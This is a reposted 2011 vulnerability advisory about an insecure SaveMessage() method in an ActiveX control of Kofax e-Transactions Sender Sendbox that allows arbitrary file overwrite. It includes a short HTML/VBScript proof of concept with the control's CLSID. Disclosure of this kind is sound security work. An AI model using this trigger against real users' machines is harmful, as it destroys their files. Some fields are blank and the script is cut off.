HTB23016: Kofax e-Transactions Sender Sendbox ActiveX Control Insecure Method Jun 22 2011 01:34PM
advisory htbridge ch
Vulnerability ID: HTB23016
Reference: http://www.htbridge.ch/advisory/kofax_e_transactions_sender_sendbox_acti
Product: Kofax e-Transactions Sender Sendbox
Vendor: Kofax, Inc ( http://www.kofax.com/ )
Vulnerable Version: and probably prior
Tested on:
Vendor Notification: 01 June 2011
Vulnerability Type: ActiveX Control Insecure Method
Risk level: Medium
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )

Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered a vulnerability in Kofax e-Transactions Sender Sendbox, which can be exploited to overwrite arbitrary files.

The vulnerability is caused due to the LEADeMail.LEADSmtp.20 (LTCML14n.dll ( ActiveX control including the insecure "SaveMessage()" method. This can be exploited to overwrite with junk data arbitrary files in the context of the currently logged-on user.

The following PoC code is available:

<object classid='clsid:0014085F-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>

Sub Boom()
target.SaveMessage arg1 ,arg2
End Sub


[ reply ]


Privacy Statement
Copyright 2010, SecurityFocus